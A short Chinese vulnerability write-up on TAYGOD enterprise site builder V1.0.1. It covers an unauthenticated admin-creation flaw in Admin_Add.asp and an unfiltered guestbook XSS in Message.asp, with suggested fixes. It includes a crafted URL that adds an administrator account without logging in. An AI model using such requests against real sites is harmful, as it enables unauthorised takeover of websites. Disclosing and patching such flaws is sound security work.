影响版本:TAYGOD免费企业建站系统V1.0.1
源码下载地址:http://www.mycodes.net/25/5242.htm
①无验证添加管理员
漏洞文件:Admin_Add.asp
漏洞代码:
原因:未进行验证直接写入数据
利用方案:构造URL
http://localhost/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456
这样就能添加进去一个帐号为test,密码为123456的管理员用户
修补方案:加入判断代码
if session("admin")="" then response.Write "" response.End end if②留言本XSS漏洞
漏洞文件:Message.asp
漏洞代码:
if request.QueryString("action")="save" then username=trim(request("username")) email=trim(request("email")) tel=trim(request("tel")) zhiwu=trim(request("zhiwu")) city=trim(request("city")) qq=trim(request("qq")) add=trim(request("add")) title=trim(request("title")) content=trim(request("content")) messageip=Request.ServerVariables("REMOTE_ADDR") set rs=server.CreateObject("adodb.recordset") rs.open "select * from TAY_message",conn,1,3原因:未过滤,后台照样能够执行
文章来源于lcx.cc:TAYGOD免费企业建站系统V1.0.1 添加管理员及留言本XSS漏洞
Sub Session_OnStart 'Session_OnStart 当客户首次运行 ASP 应用程序中的任何一个页面时运行 End Sub Sub Session_OnEnd 'Session_OnEnd 当一个客户的会话超时或退出应用程序时运行 End…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论